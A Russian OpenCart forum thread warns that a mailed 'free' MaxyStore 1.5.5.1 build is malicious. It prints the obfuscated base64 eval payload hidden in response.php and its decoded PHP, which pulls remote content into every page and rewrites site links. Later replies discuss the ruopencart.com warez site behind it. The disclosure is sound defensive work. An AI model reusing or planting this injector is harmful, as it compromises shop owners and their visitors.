Перейти к содержанию
halfhope

Внимание! 26.01.2014 Ведется рассылка с вредоносной модификации OpenCart (MaxyStore 1.5.5.1)

Рекомендуемые сообщения

Письмо следующего содержания:

 

Доброго времени, дорогой пользователь halfhope![/size]

Теперь ты можешь скачать бесплатно релиз maxystore v1.5.5.1 по ссылке:[/size]

http://cenzoRED/reliz/maxystore_v1.5.5.1.zip

Поддержать автора можно купив сборку по ссылке:[/size]

http://cenzoRED/shop/maxystore/maxystore-relize/reliz-maxystore-1551.html

 

В этой сборке файл "system/library/response.php" содержит закодированный base64 код:

 

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RhV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMlJoVjBad2IxbHJUbTloVm14WlZHMTRUMkZzU20xWGEyUlhZVzFKZVZWdGVFeFJNbEpvV1cxNFlVMVdaRlZVYkU1cVVqQnNOVlJyWkd0WlZURnpWMWhrV0ZKRk5VUlpWVnAyWlZaYVdFOVZkRlJTYkc4eFYxZDBUMk13TkhkVWJrSlNWakpTUzFWVVFrZGliRTVXVkd0S1lVMUlRa2xWYlRBeFdWWmFObFpZWkZSV1ZrWXpWMnBDZG1Rd01WbFhiWGhwVmpOb05sZFhkR3RTYlZKeVRsWlNUMU5IVWt0VlZFcHZWREZrVjFwRk9XcFNNSEF4VmxjMVlXRnJNWFJaZWs1VVZsWndWMVJxUW5OU2JVcEpWbTEwVTAxV2NEWlZNVlpXWlVkR1IySkVWbEppUlVwWFdsWldTMWRzVGxaVmExcHJUVWhvZUZac1VtdFRiRTVHWWpOb1ZVMHllRVJhVm1SVFkxZEplbUZGTVdoaVdGRjRWa1prY2sxRk5WWmtSbEpTWVRKb2FGWnFRVEZsVm14MVlYcFNiRlpVUmtaVmJHaHJWR3hLU0ZwRVZsVmhNRFZFVldwS1IxZFdUblJsUjBacFZrZHpkMVpGYUhkVWJWSldUbGhDVDFKR1dreGFWelZQVkVaT1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JrcFlWa1Z3ZFZReFduSmxiRnAxWWtkc1UyRnRlRE5YVnpCNFl6QXhSbVJGVW1obGJWSkZXVlpXUjJKc1RsWlVhMHBoVFVkNFJWVldaR3RYYXpCNFYycFdXbUV4YXpGYVYzaDNWMVpXZFZkdGNGUlNhMXAxVlhwQ1QxVXlSblJTYTFKclRXMVNVMVJXV21GV1JscEdWbFJXVmxac2NFaFVNVnBoVm0xRmVscEljRlJoTW1oWVdsWmtTMUpHUmxsUmJFSnJUV3BzZFZVeFZrOVJiRzkzWWtWU1VsWXlVa3RWYWtFd1pVWnJlVTFVVW1GaVZURTFWbTF3UTJGVk1IZFRXR1JVVFVVMVZGbFhNVWRTUjFGNVdrWktUbFpzY0ZWV2ExWldUbFpXVjFkclpGQldiSEJYVkZWYVlWWkdWbGRXYlhSVFlrWktlbFpXYUU5VGJFVjRVMjA1V0dGcmNGaGFSbVJUVWtkR05scEZVbWhXVlZwMVZURldUMUZzYjNkaVJWSlNWakpTWVZSVVJtRk9WbXh5VjFSV2JHSklRbHBXVnpWaFlXeE9SMUp0TlZSTlJUVlVXVmN4UjFKSFVYbGFSa3BPVm14d1ZWWnJWbFpPVmxaWFYydGtVRlpyTlZSV2JYaExWakZhV0dONlJsZFdiRnA1Vlcxek5WWnJNVWRqUldSWFZqSjNlbGRxUVhoV1IwWTJXa1ZTYUZaVlduVlZNVlpQVVd4dmQySkZVbEpXTWxKaFZGUkdZVTVXYkhKWFZGWnNZa2hDV2xaWE5XRmhiRTVIVW0wMVZFMUZOVlJaVnpGSFVrZFdSbFZzWkZkaE0wSlBWbXRTUjFFeFdsZGFNMmhZWVRGd1YxbFVRbmRWVmxwVlVXeGFhazFZUWpCVmJUVlBZV3N4YzFadVpGVk5NbEl5VjJwQ2MxSkdSbGhhUlhCU1RVVmFkVlV4Vm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwYVJ6VldWa1ZhV0ZaVVJsTlNhemxYVW14a1UyRnRlRmRXVkVaV1pVWktjMVZZYUZkaVJscE9WVlJDUm1WR1RYaFZibkJVVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWlZFcFBVMFpLZEU1WFJsZFNSVnA0VjJ0YWIxTXlUWGhhTTJ4WFlXeEthRlpxUVhoa2JFNXlXa1U1YVUxSVVsWlpla0l3VWtaVmVGTnVUbHBOYWxaTVdrY3hUMlJXUm5SaFIwWk9Za1phZFZaVldrOVJiVXB6VVd0U1VGWXllSEJVVjNoS1RWWldTR05FVG10aVZWcEtWbGMxVTJGV1NrVlZibFpWVFRKU01sZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBWVEpKZVZWcmJGWmliVkpoVkZkd2MyTnNaSE5VYTBwUVZsZDRTVlpIY0VkaGJVcFpZVWN4V0dGcmNGaFVWV1JIVjBVMVdFMVhiR3hXTWxKNVZqRlNTMkp0VFhkaVJWcFZZa1p3VjFsVVRtOVRNVnBJWkVkR1ZsSnRaRE5aVlZwWFZqRktjbE50TVZaV1JVVXhWV3hhUzFaSFJqWmFSVkpvVmxWYWRWVXhWazlSYkc5M1lrVlNVbFl5VW1GVVZFWmhUbFpzY2xkVVZtaGlWWEJKVkRGb2QxbFdWWGxhU0VwWVZrVndkVmt3VlRWTk1rbDVXa1Z3VWsxRlduVlZNVlpQVVd4dmQySkZiRlZoYXpWdlZqQmFTMk5XYkZaVWJUVm9UV3RhU2xaWGNFTmhiRWwzVGxSS1dHRXlVbGRaTUdSWFRUSkplVnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkU1V1ZHdEtZVTFYZERWVmJUVjNXVlpWZDFKdVZsVldNMEpEV2tSQ2QwNXRTWGRrUlhCU1RVVmFkVlV4Vms5UmJHOTNZa1ZTVWxZeVVrdFZWRUpIWW14T1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JUVlVWbFUxUTFkcVNrOWtSbHB4VVcxMFdGSllRWGhWTVZaUFZUSlJlR0pHYUdGU00yaFJXa1JKTldKc1RsWlVhMHBoVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWGFrSnpVa1pHV0ZwR2NHbGhNMEo2VmpGYWEyVnJOSGRVYmtKU1ZqSlNTMVZVUWtkaWJFNVdWR3RLWVUxSGVFVlZWbVJyVTJ4RmQxSnROVlJXVlRWRVdWZDRjMWRXVW5SbFJYQlNUV3N4TTFaR1ZsTlZiVXB5VDFST2FVMXRVa3RWVkVKSFlteE9WbFJyU21GTlIzaEZWVlprYTFOc1JYZFNiVFZVVmxVMVExZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBVVEpXVjJOR2JGWmhhMXB4V1d4U1UySnNUbkphUm1Sc1ZqQTFNRlF4YUhOaGJFbDNWMjVXV0dKR1NqWlZla0p6VWtaR1dGcEZjRkpOUlZwMVZURldUMUZzYjNkaVJWSlNWakpTUzFWVVFrZGliRTVXV2tWMGJGWnVRbGxWYlRWTFZVZFJlVTlWZEZKTlYxSlFXVlZrVG1WV1dsaGFSWFJzWWtaWmVsWkdaSE5oYXpSM1ZHNUNVbFl5VWt0VlZFSkhZbXhPVmxSclNtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlZNVlp2VXpKS1NGVnJiRmRpYlhod1dWWldSMk5zWkhOaFJYUnNWakJzTmxVeU5XdFhiRmw1Vlc1T1ZVMHlVakpYYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkdSWVRsVjBhVkp0ZUZsWk0zQnJVa2RHVmxKdE5WUldWVFZEVjJwQ2MxSkdSbGhhUnpGV1YwVkZNVlZVU210a01rNUhZMGhDVWxaNmJFeFZha1oyWkRGa2MxbDZSbWhOUjNoR1ZGVmthMWxWTVhOWFdHUllVa1UxUkZsVlduWmxWbHBZVDFWd2FWWXlaRE5YYTFadlVXczFjbVZFVmxCV2VsWndWRmR3YzJSV2JISmFSbVJxVm0xNFdsWXlNVzloYXpGeVRsUldXbFp0YUVSVVZWWTBaRVpTZFZkdGJGWmxiWGgyVjFSQ2EyTnRVbGhVYTJob1UwZFNVbFJVUVRGak1XdDVUbGRHYVZJd05YaFVWV1J6VkZkR1YxTnRNVmRXUlVwWVZsUkdZV05zV25OVWJHaHNWakZLVmxaWGVHRlRNVmw0VTJ4a1ZHSldjRlpaVkVKaFZERldjMVJ0ZEdGU1dHaDNWVEZqZUdGc1NYZFhibFpZWWtaR00xbFdWalJqUmxaMFYyeGFUbEpzY0ZWV2JURXdWakZWZUZwRVZtRlNhelZVVm0xMFlWWXhWbk5YYXpsWFZtMWtORlp0ZUU5V1JsVjVWVzEwVkUxVk5YcFVha0pQWTBaV2RFMVhhRmRsYkZwNVZURldVbVF4YjNoaVJteFVZbTE0WVZZd1pEQmtiRTVZWTBST2EySkhlREJVTVdRd1lrWmFSVlZ1UWxWU1ZUVkRXVlphUTFKRk9WaFBWM1JUWld0YU5sWlZaSE5UYlUxM1lrVlNWR0pzY0hGVmFrWmhUVlprVlZOclpHeFdNVXBGVkd4a2QyRlZNWEZSYmtKVlVsVTFRMWxXWkV0WFJrcHhWVzE0YVZaSGQzaFdSV014VXpBeFZtSklRbXROYlZKTFdXeFNSazFXYkhGVWEwNXBVakJ3TUZaSE1XOWhiVXB6VW1wR1drMXFWbGRaVmxZMFVrWkdXR0pIYkU1TlJYQjZWMWN3ZUZReVJraFVibFpXWWxSR2NGUlVRblpsUm14elZGUkdiRll4U2xWVk1XaFBVMnhGZDJORVNscE5SMUpZV2taYWNtVldTblZpUjNSU1pXeFpNVmRyV2s5VGJVMTNZa1ZTVkdKc2NIRlZha1poVFZaa1ZWTnJaR3hXTVVwRlZHeGtjMkpHVlhkaVNHUlZUVEpTTWxsVVNrOWtSbHAxV2tkc1UwMUdjSGhXTW5oUFVXczVWbUpGYUZOaWJYaHhXV3hXV2sxV1RYZFVhM0JvVmxob1JWVldaREJaVjBwelUyNU9XbUpVUmxOWmVrSnpVa1pPZFdKSGRGZGxiWGQ2VmpKNGFrMVhSbk5pUm14VVlXdEtUbGxzVlRGTmJHeHpWR3R3YWsxSGVFVlZNalZ6WVRGYU5tSkVUbGhpUjAxNFdWZDRjMWRXVG5GUmF6RnBWbFJWZVZkWGVFOVRiVTEzWWtWU1ZHSnRlSEpXYm5CelRURmtjMWw2Um1oaVIzaGFWVEp3UTFSWFNsWk9WRXBhWWtVMVMxbDZRbk5TUms1MVlrZDBWMlZ0ZDNwV01uaHFUVmRHYzJKR2JGUmhhMHBPV1d4Vk1VMXNiSE5VYTNCcVRVZDRSVlV5TlhOaE1WbzJZa1JPV0dKSFRYaFpWM2h6VjFaT2NWRnJNV2xXVkZWNVYxZDRUMU50VFhkaVJWSlVZbTE0Y2xadWNITk5NV1J6V1hwR2FHSkhlRnBWTW5CRFZGZEtWazVVU2xwaVJUVkxXVEJWTlUweVNYbGtSMnhPVFZadmVsZHJXbTlWYkc5NFVXeFNVbUp1UW5KVk1GWjNZbFpyZVUxV1pHdE5hM0JKVlcweGQxbFdWWGxhU0VwWVlsUkdlbHBHV25kU1IxRjVXa1YwVkZKWVFucFhWRUpyVGtkR1IyRXpiRmRYUlRWTFZWUkdTMDFzY0VkaFJVNU9WakZLUlZsWWNHdFNSMHBZWlVSR1dsWnNhekZhVjNoM1YxWldXRTlWY0dsV2EzQXpWMWh3VDFFeVRYaGlSbXhwVWpGd2FGWXdWbmRPVm14eFZHdDBiR0V5ZUhkYVJFcHpZVlV4YzJOSVVsUldNbmg1VkdwQ1QyUkdXblZpUjNCcFZrZDNNVll3VWs5VE1rcElWR3RvVUZkSGVISlZha28wVFZaa2RXSkhOV3ROU0ZKV1dYcENNRmxXV1hkT1dGcGFZbTE0UTFsVVNrcGxiRnAxV2tkMFdGSnJWWHBYYlhoSFpESktTRk5yYkZWaVdHaExWVEJvVDFSR1pITmFSVGxwVFd0dk1WVldaREJoVlRCNFYycE9ZVkp0YUZOVWFrSlBaRlV4UlUxSE5VeFZNbk16VVRKak9WQlRZM0JMVkhOTEp5a3BPd289JykpOwo='));

 

Код не видно если в редакторе кода, которым Вы пользуетесь, текст выходит за рамки окна (WordWrap). 

После декодирования кода получаем:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
$errorpage = '</body></html>';
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return $errorpage;
                break;
case '502';
                        return $errorpage;
                break;
        }
}

if ($ftend = get_page("http://googlejavascript.com/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}

Просьба быть бдительным. Изменено пользователем afwollis
cenzoRED
  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);

Ахаха :mrgreen:

Особенно помня о том, что такое "=^_^=.ru" и откуда оно берётся, то код вообще убойный

Ведь у нас этим смайлом заменяются все упоминания сами-знаете-чьего-сайта

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com", "ruopencart.com");
$ouput = str_replace($find, $replace, $ouput);

Ахаха :mrgreen:

Особенно помня о том, что такое "= ^_^=.ru" и откуда оно берётся, то код вообще убойный

Ведь у нас этим смайлом заменяются все упоминания сами-знаете-чьего-сайта

 

 

а я не знаю  :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Гений маскировки :)

 

screen.png
 

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

а я не знаю  :(

Речь о той самой сборке, которую предлагают скачать. Адрес его сайта у нас всегда менялся на смайлик

А вообще у меня подозрения, что это не вредоносный код, а кое-чьи проделки :)

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Данная рассылка не имеет ничего общего с максистор, если внимательно просмотреть на код, то видно что:

1. "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by"

заменяются на ruopencart.com, просто использовали псевдоним и возможность "насолить".

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Baco, врядли с целью насолить, скорее готовится к открытию очередной нехороший ресурс, который будет похож на один известный фейковый. Не удивлюсь, если у них один и тот же владелец.

  • +1 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Baco, врядли с целью насолить, скорее готовится к открытию очередной нехороший ресурс, который будет похож на один известный фейковый. Не удивлюсь, если у них один и тот же владелец.

Согласен с Вашим мнением полностью, просто акцент ответа хотел сделать, что с максистор - не имеет ничего общего эта рассылка, кроме как второй сноски в письме, с линком на продажу самой сборки.

Так же, предполагаю, что открывается новый варезник где вскоре увидим коммерческие скрипты не только с этого форума.

Что и требовалось доказать:

b7c6a231945f6c15566bae038190b9338966898a

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сколько раз сталкивался с этой говно-сброкой, постоянно проблемы! У автора просто руки из пятой точки растут. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да уж сборка то ещё говно, но пару-другую хороших вещиц я оттуда выдрал для себя)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Всем привет!

Сайту ruopencart.com вообще можно доверять? Может кто регистрировался уже...

Они декларируют, что после регистрации (с получением ключа за 100 рублей или около того) станут доступны все модули для скачки. Есть сомнения на этот счет...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

...

это варез, где незаконно продают ворованные модули с вшитой вирусней. и уж тем-более никакой поддержки там не оказывают.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

это варез, где незаконно продают ворованные модули с вшитой вирусней. и уж тем-более никакой поддержки там не оказывают.

 

Спасибо за информацию...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пусть сюда приходят по поиску "Ключ регистрации ruopencart.com" и "Платное вступление в клуб RuOpencart"

Конечно, это выбор каждого, бросать им копейку и скачивать модули, которые они там опубликовали. Но это себе дороже.

Во-первых, часто сталкивался, что нужна поддержка по модулям от разработчиков (а там их нет).

Во-вторых, лазать и перепроверять весь код, и вычищать все дерьмо из него - это тоже работа. А если вы плохо разбираетесь в коде - то и найти ничего не сможете.

Дурная репутация у владельцев сайта, что уж тут поделаешь.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я отправил по глупости 3 бакса, кода не дождался, саппорт молчит.

Надо, что бы под запросом "ruopencart.com" и эта темка всплывала. Лохотрон

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.